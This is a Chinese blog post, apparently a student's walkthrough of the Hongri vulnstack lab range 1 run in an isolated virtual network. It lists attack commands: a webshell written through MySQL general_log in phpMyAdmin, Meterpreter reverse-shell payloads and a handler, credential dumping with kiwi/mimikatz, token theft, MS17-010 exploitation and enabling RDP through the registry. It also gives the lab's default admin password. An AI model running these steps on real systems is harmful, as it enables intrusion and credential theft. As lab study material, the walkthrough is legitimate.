红日靶场1---内网学习

已于 2023-11-27 09:59:09 修改
阅读量452 收藏 2
点赞数
文章标签: 学习
于 2023-01-16 10:58:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41672971/article/details/128700867
版权

渗透

一句话木马参数使用----测试

Nmap 扫网段

dirsearch -u  http://192.168.20.104/ 扫目录

Phpadmin利用方式---开启日志----使用一句话木马

公告日志中写入一句话木马

Hackbar结合一句话

----------------------------------------------------------------------------------------------------------------------------

默认密码:hongrisec@2019

一.环境搭建

网卡学习

一个网卡一个分段,想象成一个管道

192.168.52一段

192.168.150一段

仅主机模式保证不予外界连通,保证恶意操作不会跑到真实机之上

52段是内部通信,150段属于服务器(win7)与kali通信

任务从win7拿到内部域控

 

 

 开启phpstudy,通过外部访问IP

kali机器试探能否访问

访问成功

 

 搭建成功

--------------------------------------------------------------------------------------------------------------

1.端口扫描

拿到IP扫端口

nmap -p-  192.168.20.104

 2.弱口令检测

root----root

 3.爆破一下web目录

dirsearch -u http://192.168.20.104/

 

尝试登录下面两个路径

 

 

日志导出的模块是关闭的,要把他更改成打开

 

 设置打开

set global general_log = "on"

set global general_log_file="C:/phpStudy/WWW/404.php"

 

设置之后再一次的执行任何操作都会被记录到404这个日志当中

所有运行的指令都会写入到404这个文件中

 

所以我们可以尝试写入一个一句话木马

先尝试一下phpinfo

SELECT "<?php phpinfo();?>"

成功

 

试探路径

 注意公告

加一句话木马

访问路径文件(路径出现的莫名其妙,但是主要是学习内网,不用管)

http://192.168.20.104/yxcms/protected/apps/default/view/default/info.php

 

  用hackbar传输数据,注意hackbar的用法

 测试成功之后哥斯拉上线

路径

http://192.168.20.104/yxcms/protected/apps/default/view/default/info.php

 一个域内用户

getshell之后穿内网

上线MSF

msfdb run 先启动数据库,再启动msf

生成payload

msf6 > use payload/windows/x64/meterpreter/reverse_tcp
set lhost 192.168.52.128 
set lport 5555
generate -f exe -o 64.exe

 第二种生成payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.128 lport=5555 -f exe -o 64_2.exe

上传exp

 然后开启监听端口

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

 

  执行之后发现回连回来一个shell

监听成功之后会得到一个meterpreter的监听会话

 

进入shell

查看域内信息

net config workstation

 

 修改编码

chcp 65001

查看域控的IP

net time /domain

不知所谓的错误,假设拿到了域控

ping域控之后返回的IP就是域控的IP

出现了两台主机

 

 ping一下又出现了IP

反弹shell之后抓取口令和令牌

本机的hash

 启动mimikaz

load kiwi

执行命令,发现需要管理员权限,提权

可以抓到域内的明文

此处可以先猜测一下这个Administrator是不是域管理员

Administrator  GOD.ORG  hongrisec@2019

怎么去看

进入shell------到c:/-------net group "domain admins" /domain

net group "domain admins" /domain

 发现该管理员就是该域的管理员

然后横向利用CS能够拿下域控

首先尝试偷令牌

选择这个

migrate 2268

偷取完成

然后验证他是不是域管理员,分别访问两个域

然后让他上线

 

use 4

使用第四个

https://huaweicloud.csdn.net/635643e1d3efff3090b5ccfd.html

上线不成功,目前是要了解内网情况

用meterpreter上传fscan文件,在目标机上扫描然后结果返回

这个错误就是要把文件放到指定的文件夹中才能上传

 

 上传成功

fscan64 -h 192.168.52.0/24

执行扫描命令

 

域控 

两个内网机器

都有MS17-010

search ms17-010

使用漏洞攻击

有一个是32位的服务器,使用漏洞无法攻击成功

设置rhosts=192.168.52.141(内网机器)

 

攻击

成功

 

 成功拿到

下一个使用ms17-010全版本的模块

使用模块2

 设置一下命令和rhost

 

 

很明显此处执行成功之后并且回显

 此时已经拿下了这台服务器

但是把命令修改成连接远程桌面

##开启win 2003 的远程桌面

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

##关闭win 2003 的远程桌面

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

 命令修改为开启远程桌面

bboywxy8340
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红日靶场(一)
weixin_55554070的博客
03-01 5845
一、环境配置 1.靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 2.环境IP配置: kali:net模式(外网):192.168.159.131 win7: VMnet1(内网):192.168.52.143 net模式(外网):192.168.159.136 3.测试连通性: win7能ping通所有主机,所有主机都ping不通win7,因为win7的防火墙过滤了icmp 4.开启web服务 在win7上使用phpst
2021-7-7红日团队靶场
qq_45290991的博客
07-16 1万+
这是第二次打靶场,也是实战第一次。写的比较详(luo)细(suo),看官莫怪。期间参考了很多资料,后来我也看了好几个,觉得谢公子大佬写的最详细,这里安利一波大佬神文:谢公子红日靶场一 一、环境配置 首先感谢红日安全团队分享的靶机实战环境。红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。 靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ 本文的目的是为了记录和巩固知识点,并分享出来,希望对大家能有所帮助。
vultarget-a红日靶场全面解析(完整版)
问彡心的博客
11-02 9626
这是一次完全的渗透过程,从对外开放的主机开放的通达OA系统漏洞和永恒之蓝漏洞进入第一层主机,并利用其作为跳板机,渗透第二层存在有redis未授权访问的漏洞,在根据添加路由和代理的方式成功拿到最高权限的shell,最终攻击到域控,从web渗透,到横向渗透最后到掌握域控,中间出现过很多的问题,比如通道死机,无法连接,木马程序停止在目标机运行等状况
红日靶场渗透测试——红日靶场1(详细笔记)
最新发布
qq_52849046的博客
05-24 2432
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅学习使用,切勿用于实战,容易被gangan
红日靶场(vulnstack)一 超全面详细的渗透测试学习笔记
热门推荐
qq_41821603的博客
11-24 5万+
这里写目录标题一、环境搭建二、拿下web服务器2.1 信息收集 一、环境搭建 实验环境拓扑如下: windows2008 域控 (host-only) windiws 7 web服务器 (双网卡 host-only + NAT) windows 2003 域内PC (host-only) 二、拿下web服务器 2.1 信息收集 ...
红日靶场1(渗透记录),深入解析网络安全-AutoLayout
2401_84139697的博客
04-09 694
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
红日靶场七教程,不看后悔!
weixin_45885440的博客
10-11 1464
主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
05-11
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
红日安全-wp1
08-03
护网杯 Write up--红日安全迟来的签到base64 解密,得到如下结果:根据题目提示为 xor 异或,利用 c 语言撰写脚本利用 burp 爆破获得大辣
红日AI安全-基于机器学习的攻击检测系统1
08-04
红日AI安全-基于机器学习的攻击检测系统1】主要关注的是如何运用机器学习技术来构建一个能够检测多种攻击类型的系统,特别是SQL注入和一般网络攻击。该系统的实现涉及了特征提取、数据集构建、多种机器学习算法的...
渗透思路奇思妙想 -simeon.pdf
02-25
2020年红日安全星火沙龙PPT渗透思路奇思妙想 -simeon.pdf
[红日安全]AI安全Day1-机器学习算法在web安全中的应用1
08-08
红日安全】AI安全Day1-机器学习算法在web安全中的应用1 在Web安全领域,机器学习已经成为一种强大的工具,用于识别和防御各种威胁,如恶意软件、网络钓鱼、DDoS攻击等。本文将深入探讨机器学习的基础概念及其在...
红日靶场1(渗透记录)
b1n的博客
09-12 1163
分享的靶机实战环境,这篇博客是为自己记录的同时分享出来让大佬们共同检阅,如有问题,还请多多指教。
红日靶场搭建
weixin_60362505的博客
11-15 2199
红日1靶场环境搭建
红日靶场(一)
qq_58091216的博客
05-01 3034
红一1. 实验环境拓扑如下:2. 下载好镜像文件,下载地址:(13G,需要百度网盘会员)3.需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。添加网络设配器如下图将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)而 Win2003、Win2008 网络适配器设置成VMnet1仅主机模式(内网)。网络配置完成,这三台虚拟主机默认开机密码都是。
红日靶场1搭建&渗透
m0_75178803的博客
02-03 2377
前面我们登录进去之后,可以看到还有一个yxcms的数据库,同时我们进入后台之后,可以看到一个 beifen.rar备份文件和yxcms目录,这道题其实还有一种getshell的方法,这里我们也记录一下。那么如果修改 general_log_file 的值为一个php文件,则所执行的 SQL 语句就会对应生成在对应的文件中,进而可 Getshell。,即可将一句话木马写入 hack.php 文件中 访问/hack.php 成功写入,也能访问页面,那就用蚁剑直接连一下看看。
红日靶场(1)
Barlow_121212的博客
05-14 415
8.发现具有445端口,使用MSF17_010模块添加用户,并添加到管理员用户。5.查看当前用户权限为administrators,使用CS上线。2. 测试mysql数据库连接密码,并进入phpmyadmin。7.发现其他网段,扫描网段主机,创建代理。4.通过日志写shell,并用蚁剑连接。10.探测域控主机是否开启445端口。3.尝试导入一句话木马,发现拒绝导入。利用方法如法炮制,不在复现。7.使用nmap扫描端口,6.CS 和MSF联合。9.通过远程桌面连接。
红日靶场1实战经验
YouthBelief的博客
10-27 1万+
红日靶场一0x00前言0x01环境搭建0x02web渗透1 信息收集1.1探测内网存活1.2端口扫描1.2.1 masscan扫描1.2.2 nmap扫描1.2.3 访问80端口1.2.4 目录爆破 看还存在扫描页面服务漏洞利用思路2 漏洞利用2.1 探测phpmyadmin页面2.1 phpmyadmin漏洞利用2.1.1 看是否可以写入文件2.1.2 尝试用日志写入木马getshell2.1.3 蚁剑连接3 拿下webshell后信息收集3.1 是否存在域3.2 网络连接情况 进程 杀软 服务 是否可以
红日靶场1
woshicainiao666的博客
01-13 1419
我们可以看到使用kiwi模块,爆不出密码,是因为kiwi默认是32位的系统,而win7是64位的系统,不兼容,所以我们需要将meterpreter模块迁移到64位的进程中。net config workstation ---------查看当前的域的信息。net view /domain ---------查看本机的域。第一个网卡选择------VMwear1(仅主机模式)net time /domain ----------查找域控。net view ---------查看当前域中计算机的名称。
红日靶场ping不通内网
08-17
您好!关于红日靶场无法ping通内网的问题,我需要更多的详细信息才能给出准确的解答。以下是一些可能的原因和解决方法: 1. 防火墙设置:确保您的内网防火墙未阻止来自红日靶场IP的ping请求。请检查防火墙规则并确保允许ping请求通过。 2. 内网路由设置:检查您的内网路由设置,确保正确配置了与红日靶场之间的路由。如果路由不正确,可能会导致ping不通。 3. IP地址冲突:检查内网中是否存在与红日靶场IP地址冲突的情况。如果有IP地址冲突,可能会导致通信问题。 4. 网络连接问题:检查您的网络连接是否正常。尝试使用其他设备或网络连接进行测试,以确定问题是否出现在您的设备上。 请提供更多关于您的网络设置和具体步骤的信息,以便我可以为您提供更准确的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值